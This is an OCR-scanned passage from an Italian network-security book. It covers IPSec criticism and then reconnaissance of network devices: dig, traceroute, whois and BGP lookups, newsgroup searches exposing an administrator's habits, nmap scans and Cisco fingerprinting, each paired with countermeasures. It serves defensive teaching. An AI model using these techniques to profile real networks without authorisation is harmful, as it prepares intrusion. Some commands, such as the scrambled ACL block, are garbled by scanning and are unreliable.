di fronte (in genere, è possibile identificare i dispositivi che supportano IPSec met- 
tendosi in ascolto sulla porta UDP 500, il protocollo IKE, /nternet Key Exchange 
Protocol). Come vedremo più avanti, la mancanza di chiarezza non è mai un buon 
presupposto su cui costruire un protocollo sicuro. 


L'intervento autorevole di Schneier e Ferguson 


Freschi della conquista del protocollo PPTP, Bruce Schneier e il suo collega Niels Fer- 
guson della Counterpane Internet Security, hanno pubblicato un pungente saggio sul 
protocollo IPSec, disponibile all'indirizzo http://ww.counterpane.com/ipsec.html. 
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Schneier e Ferguson si lamentano soprattutto dell’eccessiva complessità dei documenti 
degli standard IPSec e del protocollo stesso. Questa è una critica molto pesante soprat- 
tutto se proviene da un uomo il cui algoritmo crittografico è in gara per essere selezio- 
nato come il prossimo algoritmo di cifratura standard AFS (Advanced Encryption Stan- 
dard) per documenti approvati dal governo degli Stati Uniti (per ulteriori informazioni, 
http://csrc.nist.gov/encryption/aes/). 
Noi, dopo anni di inutili tentativi per cercare di accedere a questi documenti, non 
possiamo che essere d’accordo con Bruce. Anche se non ci sentiamo di consigliare 
questo saggio a chi non abbia una conoscenza approfondita di IPSec, si tratta pur 
sempre di una lettura gradevole per coloro che se ne intendono. Di seguito ripor- 
tiamo alcune delle battute tipiche e dei consigli che ne fanno un “bestseller” della 
sicurezza. 
è ‘I protocolli crittografati non dovrebbero essere sviluppati da una commis- 
sione”. 
“Il peggior nemico della sicurezza è la complessità”. 
“L'unico modo sensato per valutare la sicurezza di un sistema è eseguire 
delle verifiche di sicurezza sul sistema stesso”. (Lo scopo di questo libro.) 


e “Eliminare la modalità di trasporto e il protocollo AH, includere l’autentica- 
zione del testo cifrato nel protocollo ESP lasciando solo la modalità tunnel”. 


Schneier e Ferguson terminano con le mani alzate al cielo: “Secondo noi il proto- 
collo IPSec è troppo complesso per essere sicuro, ma è migliore di qualunque al- 
tro protocollo di sicurezza IP oggi disponibile”. Chiaramente, gli utenti attuali del 
protocollo IPSec sono nelle mani dei produttori che hanno implementato gli stan- 
dard. Resta da vedere se quello che ci aspetta è il paradiso o l'inferno man mano 
che le singole implementazioni passano l'esame attento degli hacker sparsi in tutto 
il mondo. 


Le considerazioni di Bellovin 


Ricordate che la maggior parte delle sessioni di cracking, come quelle RSA (http: // 
ww.rsasecurity.com/rsalabs/challenges/)o RC5-64 (http://ww.distributed. 
net/rc5/index.html.en) si basano sull’ipotesi che l’hacker sia in possesso di parti di 
testo in chiaro. Tuttavia, il crack delle comunicazioni cifrate è ben diverso da quello dei 
file delle password. In un flusso di comunicazione cifrato non esistono dei confini chia- 
ri che consentano di delineare l’inizio e la fine di una conversazione. Agli hacker non 
resta che procedere per tentativi, magari eseguendo invano la cifratura e il confronto di 
diversi frame della comunicazione, senza mai sapere se è stato individuato il punto di 
partenza esatto, Steven M. Bellovin, un noto gigante della sicurezza Internet dei labora- 
tori di ricerca della AT&T, ha pubblicato un saggio dal titolo “Probable Plaintext Crypta- 
nalysis of the IP Security Protocols”, in cui parla della presenza di una grande quantità 
di testo in chiaro conosciuto nel traffico IPSec. 

Anche se questa considerazione è ben lontana dallo scalfire la sicurezza del proto- 
collo IPSec, l'abbiamo citata per evidenziare quali sono le sfide da affrontare, quan- 
do si cerca di attaccare le comunicazioni cifrate. Il saggio è disponibile all'indirizzo 
http://ww.computer.org/proceedings/sndss/7767/77670052abs.htm. 


Capitolo 9 
Dispositivi di rete 


La rete è la linfa vitale di qualsiasi azienda. Chilometri di cavi di rame e fibre ottiche 
corrono nei muri delle grandi società, vero e proprio apparato circolatorio che por- 
ta ossigeno agli organi vitali. Alla loro nascita, però, le tipiche reti locali LAN (Local 
Area Network) o geografiche WAN (Wide Area Network) aziendali sono ben poco 
sicure. E non si tratta di piccoli punti deboli, perché l’hacker che conquista la vostra 
rete conquista anche l’intera azienda. Nella maggior parte dei casi, controllare la 
rete significa poter intercettare messaggi di posta o dati finanziari riservati, oppure 
reindirizzare il traffico verso sistemi non autorizzati, nonostante l'utilizzo della tec- 
nologia VPN (Virtual Private Network), o quello del firewall. 

La vulnerabilità della rete, anche se non dilagante come quelle dei sistemi, au- 
menta di quantità e qualità ogni anno. Tutto concorre alla realizzazione di un uni- 
verso selvaggio e caotico, dalle fughe di informazioni dovute a errori progettuali, 
allo scarico dell'SNMP, all’accesso ai dispositivi grazie ad account predefiniti o 
backdoor della MIB. In questo capitolo vedremo in che modo gli hacker possano 
risalire ai vostri dispositivi di rete, identificarli e violarli per ottenere un accesso 
non autorizzato. 

Poiché in pratica ogni dispositivo di rete reperibile in commercio è in grado di fun- 
zionare appena tolto dalla sua confezione con le impostazioni del produttore (sen- 
za che debba essere ulteriormente configurato), sia pure in uno stato vulnerabile, 
un aggressore determinato ha ampie probabilità di riuscire ad accedere a un host 
preso di mira. È a questo livello che si può verificare la maggior parte delle possibili 
fughe di informazioni da una rete. Non importa se questo avviene a causa di pass- 
word/configurazioni di default, di imperfezioni dell’applicazione 0 del protocollo, 0 
semplicemente di configurazioni casuali: i problemi di sicurezza derivano quasi 
sempre da errori umani. In questo capitolo presenteremo i mezzi con cui è possibi- 
le scegliere un obiettivo, rilevarne il profilo e infine comprometterlo, con poco più 
di qualche semplice tool e una salutare dose di pazienza. 


Ricerca 


Nel vasto mare di Internet, è facile trovare bersagli. La maggior parte delle reti co- 
municano l’ISP da cui dipendono e lasciano trapelare notizie sulle modalità di 
progettazione e configurazione, sui tipi di hardware e su potenziali punti vulnera- 
bili. Tenete presente che la maggior parte delle normali tecniche di esplorazione 
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iniziale serve alla raccolta di informazioni, è per sua natura non invasiva e gene- 
ralmente non è più illegale di quanto lo sia il girare la maniglia di una porta per 
controllare se questa è aperta. La possibilità di perseguire un aggressore dipende- 
rà dalle sue caratteristiche e dalle risorse legali dell’azienda, ma nella maggior par- 
te dei casi sarà difficile, se non addirittura impossibile, promuovere un'azione giu- 
diziaria. 


Riconoscimento 


I metodi di rilevamento possono essere diversi; quello principale consiste nel racco- 
gliere informazioni privilegiate senza mettere in allarme chi vigila sull’obiettivo. Al- 
meno per alcuni obiettivi, molte tecniche non verranno scoperte. 


® Individuazione del profilo 


Il rilevamento del profilo tramite la scansione delle porte parzialmente condotto 
con tecniche non appariscenti può essere effettuato con svariati tool, di cui la mag- 
gior parte è stata illustrata nel capitolo precedente. traceroute, netcat, nmap e Su- 
perScan sono alcuni dei tool consigliati per rilevare e identificare dispositivi sulla re- 
te. Molte tecniche di esplorazione iniziale possono essere rilevate e registrate da un 
sistema di intercettazione delle intrusioni (IDS); questo dipenderà dal tipo di obiet- 
tivo del processo di rilevamento. È consigliabile utilizzare una tecnica di rilevamen- 
to semplice e pertinente. La maggior parte delle informazioni può essere ricavata 
dalle fonti più semplici. 


® Dig 


Diffusione: 10 
Semplicità: 10 
Impatto: S 
Fattore di rischio: 3 


Dig è un sostituto debitamente aggiornato di nslookup, utile soprattutto per l’am- 
biente UNIX. Dig è un tool molto semplice. Utilizzando gli intuitivi parametri della 
riga di comando, è possibile raccogliere quantità incredibili di informazioni sui 
nomi di dominio dell'obiettivo. Nell'esempio seguente possiamo vedere come bi - 
gcompany.com si basa su bigisp per il suo servizio DNS. A quanto pare, bigcom- 
pany.com ha alcuni server della posta elettronica ridondanti. Entrambe le voci dei 
server della posta sembrano puntare allo stesso indirizzo IP. Potrebbe trattarsi di un 
qualche tipo di bilanciamento dei carichi dei server della posta, o di una configura- 
zione personalizzata, sebbene si tratti più probabilmente di un errore di configura- 
zione commesso dall’amministratore. Dig vi consente di dare un'occhiata discreta e, 
nella maggior parte dei casi, impossibile da rilevare, all’interno di bigcompany.com 
e delle sue dipendenze: 


mploessel@irc.secsup.org:-# dig -t mx bigcompany.com 
; <<>> DiG 9.1.3 <<>> -t mx bigcompany.com 


i; global options: printemd 
j; Got answer: 
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jj ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5278 
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 4 


i; QUESTION SECTION: 


ibigcompany.com. IN MX 

i; ANSWER SECTION: 

bigcompany.com. 34 IN MX O mx2.serv.net. 
bigcompany.com. 34 IN MX 0 mx1.serv.net. 


3; AUTHORITY SECTION: 


bigcompany.com. 34 IN NS dns2.bigisp.com. 
bigcompany.com. 34 IN NS dns.bigisp.com. 
i; ADDITIONAL SECTION: 

mx1.serv.net. 86176 IN A 172.32.45.7 

mx2.serv.net. 86151 IN A 172.32,45,7 
dns.bigisp.com. 172534 IN A 192.168.15.9 
dns2.bigisp.com. 172534 IN A 192.168.15.9 


i; Query time: 2 msec 

ji SERVER: 127.0.0.1#53(0.0.0.0) 
i; WHEN: Mon Nov 24 1:00:01 2002 
i; MSG SIZE revd: 188 


® traceroute 


Diffusione: 10 
Semplicità: 10 
Impatto: 3 
Fattore di rischio: 8 


Il programma di utilità traceroute o tracert, compreso rispettivamente in UNIX 
o NT, permette di stabilire quali siano i principali router che vi separano dall’host 
di destinazione. Questo è un ottimo punto di partenza per inquadrare un compo- 
nente fondamentale dell’infrastruttura di una rete (i router), senza dubbio uno dei 
preferiti dagli hacker. traceroute invia a destinazione diversi pacchetti (i pac- 
chetti traceroute UDP e ICMP sono utilizzati rispettivamente su UNIX e Win- 
dows). Il primo pacchetto TTL (Zime To Live) sarà 1 e aumenterà per ogni salto in- 
dividuato. Quando il pacchetto attraversa il router, il suo TTL diminuisce di 
un'unità. Se il TTL assume il valore zero, il pacchetto è eliminato e viene inviata 
una notifica all’host di origine. Nell'esempio seguente vediamo che ogni salto ri- 
sponde con un pacchetto ICMP a TTL scaduto, che ci segnala ciascun salto e l’in- 
dirizzo IP dell'interfaccia di rete più vicina all'origine: 


mploessel@irc.secsup.org:-# traceroute 10.14.208.3 

traceroute to 10.14.208.3 (10.14.208.3), 30 hops max, 40 byte packets 

1 64.200.142.202 (64.200.142.202) 0.299 ms 0.33 ms 0.253 ms 

2 sntccalwcx2-0c48.wceg.net (64.200.151.97) 3.486 ms 3.538 ms 3.989 ms 
3 sntceca4lcx1-pos9-0.wcg.net (64.200.240.126) 3.877 ms 3.795 ms 4.229 
Ms 

4 p12-1.pr01.sjc03.atlas.psi.net (154.54.10.113) 3.936 ms 3.83 ms 
3.852 ms 
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5 g9.bal.sfot.atlas.cogentco.com (66.28.66.138) 5.916 ms 5.903 ms 
5.867 ms 

6 customer-2.demarc.cogentco.com (10.14.208.3) 5.955 ms 5.96 ms 6.92 
ms 

7 z.root-servers.net (7.14.9.50) 6.141 ms 5.955 ms 5.869 ms 


Visto che 10.14.208.3 è l’ultimo salto che precede l’obiettivo, possiamo essere ab- 
bastanza sicuri che si tratti di un router per l’inoltro del traffico: questo è il dispo- 
sitivo (insieme agli altri presenti sul percorso) che con maggiore probabilità attire- 
rà per primo le attenzioni degli hacker (in realtà, l’intera subnet). Tuttavia, tra co- 
noscere l'indirizzo IP di un router e riuscire a sfruttarne un punto debole corre un 
abisso: prima sarà necessario identificarlo utilizzando la scansione delle porte e il 
riconoscimento del sistema operativo e approfittando di eventuali fughe di infor- 
mazioni del produttore. 


DÌ Contromisura al tracerouting 


L'ACL seguente consente di limitare le risposte di un router Cisco ai pacchetti che 
hanno superato il proprio TTL: 


access-list 101 deny icmp any host 1.2.3.4 11 0 log 


Per interdire il traffico indirizzato specificamente in corrispondenza di un router, 
consigliamo l'utilizzo del comando seguente (che tuttavia potrebbe non essere ap- 
propriato in tutte le situazioni): 


access-list 101 deny ip any host 10.14.208.3 log 


Ripetete questa riga per tutte le interfacce del router. 
In alternativa, è possibile consentire il trasferimento di pacchetti ICMP con specifi- 
che reti affidabili, impedendo il resto: 


55.255.255 11 0 


access-list 101 permit icmp any 7.14.9. 
18; og 


0. 
access-list 101 deny icmp any host 4 


0 0.2 
3.4 1 
Per una spiegazione approfondita delle restrizioni ICMP, vi rimandiamo alla guida 
di Rob Thomas (http://www.cymru.com/Documents/icmp-messages.html)., 


Ricerca degli IP 


Il database ARIN, disponibile all'indirizzo http://Www.arin.net, è un buon punto 
di partenza per la raccolta di informazioni: le ricerche su ARIN sono molto utili per 
stabilire quali sono gli intervalli IP del sistema preso di mira, chi è il responsabile e 
quando sono state effettuate le ultime modifiche. Ecco un esempio: 


OrgName: EXAMPLE 

OrgiD: EXAMPLEA 

NetRange: 192.0.32.0 - 192.0.47.255 
CIDR: 192.0.32.0/20 

NetName: EXAMPLE 


NetHandle: NET-192-0-32-0-1 
Parent: NET-192-0-0-0-1 
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NetType: Reassigned 
NameServer: NS1.EXAMPLE.COM 
NameServer: NS2.EXAMPLE.COM 


Comment: 
RegDate: 1999-10-14 
Updated: 2001-11-09 


AdminHandle: MW3137-ARIN 
AdminName: Mark Wilkerson 
AdminPhone: +1-949-555-1212 
TechHandle: BS313-ARIN 
TechName: Bradford Smith 
TechPhone: +1-949-555-1213 
TechEmail: smithbm@example.com 


# ARIN Whois database, last updated 2002-12-03 19:05 
# Enter ? for additional hints on searching ARIN's Whois database. 


Ricerche Autonomous System 


AS (Autonomous System) è un termine del gergo di Internet (TCP/IP) utilizzato per 
indicare un insieme di gateway (router) appartenenti a un’unica entità amministrati- 
va. 

Un ASN (Autonomous System Number) è un identificatore numerico per le reti coin- 
volte nel BGP (Border Gateway Protocol), il protocollo nel quale i percorsi di instra- 
damento sono comunicati a tutto il mondo. Senza il BGP, il traffico di Internet non 
potrebbe uscire dalle reti locali. 


Utilizzo normale di traceroute 


L’output di traceroute su una macchina UNIX o Microsoft Windows visualizza uni- 
camente le informazioni di risposta TTL: 


example.att.net# traceroute ww.example.com 
traceroute to ww.example.com (192,0.34.72), 30 hops max, 40 byte packets 
1 white _dwarf.cbbtier3.att.net (12.0.1.1) 4 msec 4 msec 0 msec 
ggri-p320.n54ny.ip.att.net (12.122.12.54) 4 msec 4 msec 4 msec 
pos5-3.pr1.lgai.us.mfnx.net (64.125.12.21) 4 msec 0 msec 4 msec 
so-1-0-0.cr2.dca2.us.mfnx.net (208.184.233.129) 8 msec 8 msec 8 msec 
so-5-1-@0.mpr4.sjc2.us.mfnx.net (64.125.30.30) 7 msec 7 msec 7 msec 
pos®-0.mpr2.lax2.us.mfnx.net (208.185.156.126) 7 msec 8 msec 8 msec 
example-ti-demarc.lax.mfnx.net (208.185.82.97) 8 msec 7 msec 8 msec 
ti-customer-dmarc.example.com (2098.184.95.130) 8 msec 8 msec 8 msec 
example.att.net# 


2 
3 
4 
5 
6 
7 


traceroute con informazioni ASN 


C:\telnet route-server.ip.att.net 
route-server>traceroute ww.example.com 
Type escape sequence to abort. 
Tracing the route to www.example.com (192.0.34.,72) 
1 white_dwarf.cbbtier3.att.net (12.0.1.1) [AS 7018] 0 msec 0 msec 0 msec 
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2 ar3.n54ny.ip.att.net (12.126.0.30) [AS 7018] 0 msec 0 msec Q msec 

3 tbr2-p013801.n54ny.ip.att.net (12.122.11.17) [AS 7018] 4 msec 4 msec 4 
msec 

4 pos5-3.pr1.lgai.us.mfnx.net (64.125.12.21) [AS 6461] 4 msec 0 msec 4 
msec 

5 so-1-0-0.cr2.dca2.us.mfnx.net (208.184.233.129) [AS 6461] 6 msec 4 
wmsec 6 msec 

6 so-5-1-0.mpr4.sjc2.us.mfnx.net (64.125.30.30) [AS 6461] 7 msec 7 msec 
7 msec 

7 pos@0-0.mpr2.lax2.us.mfnx.net (208.185.156.126) [AS 6461] 7 msec 8 msec 
=»8 msec 

8 example-t1-demarc.lax.mfnx.net (208.185.82.97) [AS 6461] 8 msec 7 msec 
8 msec 

9 ww.example.com (208.184.95.130) [AS 6461] 9 msec 9 msec 9 msec 


route-server> 


Il traceroute originario da un host coinvolto nel BGP mostra le informazioni ASN. 
Con queste informazioni supplementari, possiamo scoprire che il nostro traffico ha 
avuto inizio in AS7018 (rete ATT) ed è saltato a AS6461 (MFNX, di proprietà di Abo- 
venet). Esso ha quindi attraversato il punto di demarcazione di example.com ed è 
arrivato a destinazione (il server Web di example.com). 

In base a questo output, possiamo assumere dal DNS inverso sul salto 13 che exam- 
ple.com ha un circuito T1. Se osserviamo attentamente, possiamo vedere che l’ASN 
non cambia con il salto 14. Questo è un segno abbastanza sicuro del fatto che 
example.com non dispone di altre connessioni a Internet ridondanti. Se ci fidiamo 
del DNS inverso, possiamo assumere che la massima larghezza di banda di exam- 
ple.com è di 1,544 Mbps con un limite massimo di pacchetti TCP al secondo pari a 
4825 (per una dimensione del pacchetto di 40 byte; intestazione IP, intestazione 
TCP e nessun dato). 

Di solito i percorsi primari di una rete hanno percorsi ridondanti. Per vedere gli altri 
percorsi possibili, effettuate una semplice ricerca dei percorsi IP BGP. 


show ip bgp 


route-server>show ip bgp 208.184.95.130 
BGP routing table entry for 208.184.0.0/15, version 96265 
Paths: (20 available, best #20, table Default-IP-Routing-Table) 
Advertised to non peer-group peers: 
12.161.130.230 
7018 6461, (received & used) 
12.123.45.252 from 12.123.45.252 (12.123.45.252) 
Origin IGP, localpref 100, valid, external 
Community: 7018:5000 7018 6461, (received & used) 


[ output abbreviato per motivi di spazio ] 


7018 6461, (received & used) 
12.123.139.124 from 12.123.139.124 (12.123.139.124) 
Origin IGP, localpref 100, valid, external 
Community: 7018:5000 
7018 6461, (received & used) 
12.123.137.124 from 12.123.137.124 (12.123.137.124) 
Origin IGP, localpref 100, valid, external 
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Community: 7018:5000 
7018 6461, (received & used) 
12,123.1.236 from 12.123.1.236 (12.123.1.236) 
Origin IGP, localpref 100, valid, external, best 
Community: 7018:5000 
route -server> 


I tool di ricerca AS visualizzano una panoramica delle connessioni di rete. Come 
potete vedere dall’output precedente, ATT e Abovenet hanno molti link ridondanti 
e sono connesse molto bene. 

Molti tool di ricerca con funzionalità grafiche agevolano questo processo. Per ulte- 
riori informazioni potete consultare le fonti seguenti: 


e la pagina di consultazione di Thomas Kernen (ww.traceroute.org); 

e il Graphical AS Path Tool, di Philippe Bourcier (http://mogwai.fr- 
nog.org/sysctl/gasp/ 
FixedOrbit http://ww.fixedorbit.com/; 


il registro degli instradamenti RADB di Merit Networks (http://ww.ra- 
db.net). 


Newsgroup aperti al pubblico 


Utilizzando le informazioni raccolte dall’ARIN (American Registry for Internet Num- 
bers) e da NSI (Network Solutions Inc), è possibile raccogliere diversi dati sulle per- 
sone importanti da contattare di qualsiasi organizzazione. Talvolta la ricerca di no- 
minativi di queste persone all’indirizzo http://groups.google.com fornirà infor- 
mazioni interessanti: 


From: Bradford Smith (smithbm@example.com) 
Subject: Cisco Logging 


Newsgroups: comp.dcom.sys.cisco This is the only article in this thread 
Date: 2002/12/20 View: Original Format 


I have been unsuccessful is pulling logs off any cisco device onto a 
syslog server. I refuse to spend time viewing logs on every device. 


I am using a cisco 7206 router (10.14.208.3) (IOS 11.1) and sending the 
logs to local syslog server (10.14.208.10). I receive a "Access-Reject" 
message in the logs. What causes this error? Responses before the holidays 
are appreciated as I will be away from the office dec 20 - jan 5. 


-Brad 


Da un semplice messaggio inviato a un newsgroup, sappiamo ora che attualmente 
Brad non è solito controllare i suoi file di log e che sarà assente dall'ufficio per 
quindici giorni. Molto interessante! 
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© Contromisure all’individuazione del profilo 


Nessun trucco o tool può sostituire una buona padronanza dei protocolli di rete e 
del software utilizzato per accedervi; inoltre qualsiasi sistema IDS o firewall del 
mondo serve a poco nelle mani di un utente inesperto. 
Di seguito sono elencati alcuni consigli su come tenere al riparo le vostre informa- 
zioni private: 
e prestate attenzione a quanto dite e a dove lo dite. I forum di discussione 
sono molto utili; ricordatevi però di utilizzarli con discernimento; 
e eseguite le applicazioni in un ambiente di produzione solo se vi sentite a 
vostro agio e sapete come limitare la divulgazione di informazioni; 
e mocdificate le impostazioni di default e i messaggi delle applicazioni. Sebbe- 
ne l’oscuramento delle informazioni non sia un'autentica tecnica di sicurez- 
za, esso è un efficace deterrente per un aggressore; 
e soprattutto, utilizzate il buon senso comune. Concedetevi il tempo necessa- 
rio per verificare le configurazioni. Riflettete a lungo su ciò che state per 
fare e documentate qualsiasi modifica. 


Rilevamento dei servizi 
Il rilevamento dei servizi è solo il primo passo. Il rilevamento del profilo dei servizi 


in esecuzione su un host ci mostra i servizi potenzialmente vulnerabili in esecuzio- 
ne sul sistema bersaglio. 


C) nmap 


Diffusione: 10 
Semplicità: 10 
Impatto: Pa; 
Fattore di rischio: 8 


Nmap è per antonomasia lo scanner delle porte dei moderni hacker. Esso può essere 
utilizzato per semplici scansioni ma anche per stabilire quali sono gli host attivi su 
una determinata sottorete o individuare i sistemi operativi degli host remoti. Questo 
sorprendente e valido tool è dotato di numerose funzionalità, troppe per essere illu- 
strate tutte in questa sede. L'utilizzo di nmap è particolarmente consigliabile; per mag- 
giori informazioni, consultate “man nmap” su una macchina UNIX. Utilizzando nmap 
per eseguire la scansione delle porte da un sistema Linux, come sempre possiamo 
scoprire su quali porte è in ascolto il router (192.168.0.1). I tipi di porta ci permette- 
ranno di fare enormi passi avanti verso l’identificazione del tipo di router. La Tabella 
9.1 elenca le porte TCP e UDP più comuni che si trovano sui dispositivi di rete mag- 
giormente diffusi. Per un elenco completo delle password, vi rimandiamo all’indiriz- 
zo http://phenoelit.darklab.org/cgi-bin/display.pl1?SUBF=list&SORT=1. 
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Tabella 9.1 Peridentificare un dispositivo è possibile verificare lo stato delle porte in questo 
elenco, ricordando che le specifiche porte aperte possono variare a seconda dell'implementazione 


Hardware TCP UDP 
Router Cisco 21 (ftp) 0 (tepmux) 
23 (telnet) 49 (domain) 
22 (SSH) 67 (bootps) 
79 (finger) 69 (tftp) 
80 (http) 123 (ntp) 
179 (BGP) 161 (snmp) 
512 (exec) 
513 (login) 


514 (shell) 
1993 (SNMP Cisco) 
1999 (ident Cisco) 


2001 
4001 
6001 
9001 (servizio XRemote) 
Switch Cisco 23 (telnet) 0 (tcpmux) 
123 (ntp) 
161 (snmp) 
Router Bay 21 (ftp) 7 (echo) 
23 (telnet) 9 (discard) 
67 (bootps) 
68 (bootpc) 
69 (TFTP) 


161 (SNMP) 

520 (route) 
Router Ascend 23 (telnet) 7 (echo) 

9 (discard) * 

161 (SNMP) 

162 (snmp-trap) 

514 (shell) 

520 (route) 
* La porta discard degli Ascend accetta solo pacchetti in un formato speciale (secondo Network As- 
sociates Inc.), quindi l'esito di una scansione su questa porta potrebbe variare. 


Per trovare un router Cisco, si può utilizzare una scansione alla ricerca delle porte 
TCP 1-25, 80, 512-515, 2001, 4001, 6001 e 9001. Il risultato della scansione può rive- 
lare molto sulle origini del dispositivo: 


[/tmp]# nmap -pi1-25,80,512-515,2001,4001,6001,9001 192.168.0.1 
Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) 
Interesting ports on (192.168.0.1): 


Port State Protocol Service 
TÀ open tcp echo 

9 open tcp discard 
13 open tcp daytime 
19 open tcp chargen 
22 open tcp ssh 

23 filtered tcp telnet 
2001 open tcp de 

6001 open top X11:1 


Per confermare la nostra ipotesi sul fornitore e sul livello del sistema operativo, uti- 
lizzeremo il fingerprinting TCP (come spiegato nel Capitolo 2). 


_ > 
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Un'altra caratteristica dei sistemi Cisco sono i prompt “User Access Verification” sul- 
le porte vty, 23 e 2001. E sufficiente collegarsi al router su queste porte con telnet 
per ottenere il noto banner: 


User Access Verification 
Password: 


Su molti dispositivi Cisco viene eseguito SSH in sostituzione di telnet. Anche con 
questa sostituzione dovuta a motivi di sicurezza, è tuttora possibile scoprire un ban- 
ner familiare: 


mploessel@irc.secsup.org:-$ telnet 10.14.208.3 22 
Trying 10.14.208.3... 

Connected to 10.14.208.3. 

Escape character is '*]'. 

SSH-1.5-Cisco-1.25 

Connection closed by foreign host. 
mploessel@irc.,secsup.org:-$ 


Contromisure al rilevamento dei servizi 


Per contrastare la divulgazione di informazioni provocata dagli scanner delle 
porte, è stato sviluppato un certo numero (abbastanza limitato) di tool. Nel 
complesso, la migliore strategia consiste nel rigettare completamente tutto il 
traffico indesiderato presente ai confini della rete. È fondamentale avere una vi- 
sibilità limitata rispetto al mondo esterno di Internet. L’utilizzo di PortSen- 
tryPortSentry è il secondo metodo di protezione in ordine di efficacia; Port - 
Sentry sta in ascolto delle porte non utilizzate su un sistema, rilevando eventua- 
li richieste di connessione su queste porte presunte inattive: 


root@nsi:/home/stikk/portsentry-1.1# netstat -lpn 
Active Internet connections (only servers) 
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 


tcp (o) 0 0.0.0.0:54320  0.0.0.0:* LISTEN 1959/portsentry 
tcp ()) 0 0.0.0.0:32774  0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:31337  0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:27665 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:20034 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:12346 0.0.0.0:* LISTEN 1959/portsentry 
top (o) 0 0.0.0.0:12345  0.0.0.0:* LISTEN 1959/portsentry 
tep (') 0 0.0,0.0:6667 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:5742 20.0.0.0:* LISTEN 1959/portsentry 
top (0) 0 0.0.0.0:2000 0.0.0.0:* LISTEN 1959/portsentry 
tcp (0) 0 0.0.0.0:635 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:443 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:143 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:119 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:25 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:23 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:22 0.0.0.0:* LISTEN 1959/portsentry 
tcp (o) 0 0.0.0.0:21 0.0.0.0:* LISTEN 1959/portsentry 
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È possibile selezionare porte specifiche tramite un file di configurazione: 


# PortSentry Configuration 

# $Id: portsentry.conf,v 1.23 2001/06/26 15:20:56 crowland Exp crowland $ 
# IMPORTANT NOTE: You CAN NOT put spaces between your port arguments. 

# The default ports will catch a large number of common probes 

# All entries must be in quotes. 

HHHHHHHHAHHHHHHHHHHHHHH# 


# Port Configurations # 


HHHHHHHHHAHHHHHHHHHHHHH 

# Use these for just bare-bones 
TCP_PORTS="1,11,15,110,111,143,540,635,1080,1524, 2000, 12345, 12346, 20034, 
32771,32772,32773,32774,49724,54320" 
UDP_PORTS="1,7,9,69,161,162,513,640,700,32770,32771,32772,32773,32774, 
31337,54321" 


Se un aggressore effettua una scansione delle porte, PortSentry rileva i tentativi di 
connessione a porte inutilizzate e chiude tutte le future connessioni dall'TP di desti- 
nazione tramite un comando null route. Questo comando interrompe ogni comu- 
nicazione con l'aggressore, che resterà tagliato fuori dal vostro host: 


/sbin/route add 3.1.3.3.7 dev lo 


Una volta attivato il blocco, la vostra tabella di instradamento sarà simile alla se- 
guente: 


root@nsi:/home/stikk/portsentry-1.1# route 
Kernel IP routing table 


Destination Gateway Genmask Flags Metric Ref Use 
Iface 

931.3.3.7 è 255.255 .255.255 UH (1) (1) 0 lo 
localnet * 255.255,255.0 U (o) (1) (o) 
ethQ 

loopback “ 255.0.0.0 U (4) (1) 0 lo 
default 192.168.1.254 0.0.0.0 UG 1 (") 0 
ethQ 


Prima di eseguire PortSentry, esaminate attentamente il file di configurazione: 
possono essere inviati pacchetti contraffatti che consentono a un aggressore di sele- 
zionare host da desensibilizzare. 


le 


Lo) Identificazione del sistema operativo 


Diffusione: 10 
Semplicità: 10 
Impatto: w 
Fattore di rischio: 7 


Nell'esempio precedente, sospettiamo che il dispositivo all'indirizzo IP 10,14,208.3 
sia un router Cisco, ma possiamo utilizzare le funzionalità di riconoscimento del si- 
stema operativo di nmap per confermare questa ipotesi. Visto che la porta TCP 13 è 
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aperta, specifichiamo il parametro -0 di nmap per identificare il sistema operativo 
presente sul dispositivo, in questo caso Cisco IOS 11.2: 


[root@source /tmp]# nmap -0 -p13 -n 192.168.0.1 

Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) 
Warning: No ports found open on this machine, 0S detection will be MUCH 
less reliable 

Interesting ports on (172.29.11.254): 

Port State Protocol Service 

13 filtered tep daytime 

Remote operating system guess: Cisco Router/Switch with IOS 11.2 


Se possibile, fate in modo di limitare a una sola porta le scansioni per l'identifi- 
cazione del sistema operativo. Alcuni sistemi operativi, tra cui Cisco [OS e Sun 
Solaris, possono avere problemi a causa dei pacchetti non standard RFC che 
vengono inviati, e questo potrebbe disattivare alcuni sistemi. Per informazioni 
più dettagliate sul fingerprinting dello stack, fate riferimento al Capitolo 2. 


O Contromisura all’identificazione del sistema operativo 
Intercettazione e prevenzione 


La tecnica di intercettazione e prevenzione delle scansioni per il riconoscimento del 
sistema operativo è la stessa analizzata nel Capitolo 2, con variazioni sul tema in 
base al ruolo del dispositivo di rete. Una buona strategia consiste nel bloccare tutto 
il traffico destinato a un dispositivo; questa contromisura aiuterà a contrastare le 
identificazioni del sistema operativo. 


de 


® Enumerazione e cattura dei banner Cisco 


Diffusione: 10 
Semplicità: 10 
Impatto: 1 
Fattore di rischio: FS 


Anche se le apparenze fanno pensare a un Cisco (e probabilmente è così), questo 
non basta. Il semplice fatto di trovare le porte che ci si aspetta non è sufficiente per 
un'’identificazione certa. Ma ci sono altri elementi che possono confermare i sospetti. 


Cisco: finger e Virtual Terminal Ports, 2001,4001,6001 


Generalmente il servizio finger di Cisco restituisce informazioni del tutto inutili. Le 
vty dei Cisco (solitamente 5) rispondono a dei semplici finger -1 @<host>, ma il 
risultato è ben poco rivelatore (a parte identificare il dispositivo come Cisco). 

Altri identificatori altrettanto inutili sono le porte di gestione 2001, 4001 e 6001. Con 
